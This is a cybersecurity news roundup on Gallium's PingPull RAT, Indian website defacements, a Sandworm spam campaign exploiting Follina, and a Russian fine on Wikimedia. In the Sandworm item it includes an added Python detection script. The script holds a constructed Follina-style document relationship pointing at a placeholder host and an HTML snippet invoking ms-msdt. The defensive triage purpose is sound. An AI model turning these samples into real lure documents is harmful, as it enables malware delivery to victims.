At a glance.
- Chinese APT deploys new RAT.
- Hacktivism roils Indian websites.
- Ukraine reports GRU spam campaign against media outlets.
- Russian court fines Wikimedia for "disinformation" over the war.
Chinese APT deploys new cyberespionage tool.
In a report this morning, Palo Alto Networks' Unit 42 outlines the recent activities of Gallium, a Chinese government threat actor particularly active against select targets in Australia, Southeast Asia, Africa, and Europe. Gallium has also been associated with Operation Soft Cell, a campaign against telecommunications providers. The recent operations Palo Alto describes are distinguished by their employment of "a new, difficult-to-detect remote access trojan named PingPull." They're also marked by an expansion to sectors other than telecommunications, specifically government organizations and financial services. Palo Alto has shared detailed findings with fellow members of the Cyber Threat Alliance. The company also extends "special thanks to the NSA Cybersecurity Collaboration Center, the Australian Cyber Security Centre and other government partners for their collaboration and insights offered in support of this research."
Hacktivism roils India after politician's remarks about the Prophet.
Remarks by a representative of India's ruling Bharatiya Janata Party (BJP) have prompted a defacement campaign against websites belonging to Indian diplomatic, academic, and agricultural organizations. The actions, claimed by the hacktivist group DragonForce Malaysia, are organized around the message, "For you is your religion and for me is my religion." The Times of India quotes Prasad Patibandla, director (research and operations) at the Centre for Research on Cyber Intelligence and Digital Forensics, as saying, correctly, "Website defacement is the lowest form of cyber attack. Data theft, particularly financial data theft and personal data, will impact people and the banking sector." He adds, "Companies and government organisations must step up cybersecurity." The remarks themselves, by Nupur Sharma, were taken by many Muslims, including Muslim governments, to be defamatory and blasphemous.
Ukraine reports a "massive" spam campaign against the country's media organizations.
An email from the Press Office of Ukraine's State Service of Special Communication and Information Protection (SSSCIP) on Saturday warned that a "massive" spam campaign against media outlets had begun:
"The Computer Emergency Response Team of Ukraine (CERT-UA) acting under the SSSCIP warns about mass spamming with dangerous emails titled 'Interactive Map Reference List'. In particular, these emails are targeting media outlets (radio stations, newspapers, news agencies, etc.) of Ukraine. Over 500 destination email addresses have been identified. These emails contain an attached document ... opening which may initiate downloading of CrescentImp malware. Specialists warn that cyber criminals have been increasingly resorting to email spamming from compromised addresses of public institutions. If you fall victim to a cyberattack, please contact the CERT-UA immediately. This activity is tracked by UAC-0113 (attributed to the Sandworm group with a medium certainty level). As reported earlier, this group was involved in orchestrating a massive attack on the energy sector of Ukraine in April."
Sandworm is a Russian threat actor associated (in MITRE's ATT&CK catalogue) with Russia's GRU military intelligence service and perhaps best known for its role in the 2015 and 2016 cyberattacks against sections of Ukraine's power grid. The group has also been fingered for the 2017 NotPetya pseudo-ransomware attack and 2018's Olympic Destroyer incident.
The attached document appears to exploit the Follina vulnerability in the Microsoft Support Diagnostic Tool (MSDT), CVE-2022-30190, to install a downloader for the CrescentImp malware. CrescentImp's provenance and functionality remain unclear, BleepingComputer reports, but CERT-UA has published indicators of compromise to assist in its detection.
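As an added illustration (not code from the page, CERT-UA, or BleepingComputer), the following Python triages a .docx for the delivery pattern publicly documented for Follina: an external OLE object relationship in the document's .rels part that points at a remote HTML page, and an ms-msdt: URI in that page. The sample documents, the placeholder URL on example.invalid, and the HTML snippet are all constructed here; CERT-UA's actual indicators are not reproduced, and the verdict strings are this example's own names.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship namespace and the relationship type Word uses for OLE objects.
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
)
# The MSDT URL protocol handler abused by CVE-2022-30190.
MSDT_RE = re.compile(r"ms-msdt:", re.IGNORECASE)


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal OOXML zip. Constructed for this example only; a real
    document carries many more parts, but the .rels part is what matters here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed .rels with only an internal styles relationship (benign shape).
BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
</Relationships>"""

# Constructed .rels with an external oleObject relationship to a remote HTML page.
# The trailing "!" on the target mirrors the public Follina samples; the host is a placeholder.
SUSPICIOUS_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://example.invalid/RDF842l.html!" TargetMode="External"/>
</Relationships>"""

BENIGN_DOCX = build_docx(BENIGN_RELS)
SUSPICIOUS_DOCX = build_docx(SUSPICIOUS_RELS)

# Constructed stand-in for the remote HTML; the real pages carry a full MSDT parameter string.
CONSTRUCTED_HTML = """<html><body><script>
window.location.href = 'ms-msdt:/id PCWDiagnostic /skip force /param omitted';
</script></body></html>"""


def external_ole_targets(docx_bytes: bytes) -> list:
    """Return Target URLs of every external oleObject relationship in any .rels part."""
    targets = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("Type") == OLE_REL_TYPE and rel.get("TargetMode") == "External":
                    targets.append(rel.get("Target"))
    return targets


def html_invokes_msdt(html: str) -> bool:
    """True if the fetched page tries to launch the ms-msdt: protocol handler."""
    return MSDT_RE.search(html) is not None


def triage_docx(docx_bytes: bytes, fetched_html=None) -> str:
    """Combine both checks. fetched_html is the remote page, retrieved out of band
    in a sandbox; pass None if it was not (or should not be) fetched."""
    targets = external_ole_targets(docx_bytes)
    if not targets:
        return "clean"
    if fetched_html is not None and html_invokes_msdt(fetched_html):
        return "follina-msdt"
    return "suspicious-external-ole"


if __name__ == "__main__":
    print("benign:", triage_docx(BENIGN_DOCX))
    print("suspicious, page not fetched:", triage_docx(SUSPICIOUS_DOCX))
    print("suspicious, page fetched:", triage_docx(SUSPICIOUS_DOCX, CONSTRUCTED_HTML))
```

An external oleObject relationship is uncommon enough in ordinary business documents that the first check alone is worth an alert; the second check only confirms the MSDT chain and should run on a copy of the page fetched from a sandbox, never by opening the document. On the endpoint side, Microsoft's published workaround for CVE-2022-30190 was to disable the ms-msdt: URL protocol handler by removing its HKEY_CLASSES_ROOT registry key, so a host where that key is still present remains exposed until patched.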
Russian court fines Wikimedia for "disinformation."
The Verge reports that a Moscow court has fined the Wikimedia Foundation five million rubles (about $65 thousand) for its coverage of Russia's "special military operation," as Moscow terms its war against Ukraine. Wikimedia is appealing the fine. Stephen LaPorte, associate general counsel at the Wikimedia Foundation, said, "This decision implies that well-sourced, verified knowledge on Wikipedia that is inconsistent with Russian government accounts constitutes disinformation. The government is targeting information that is vital to people's lives in a time of crisis. We urge the court to reconsider in favor of everyone's rights to knowledge access and free expression." Wikimedia also argues that the Russian court lacks jurisdiction over it.
The CyberWire's continuing coverage of the unfolding crisis in Ukraine may be found here.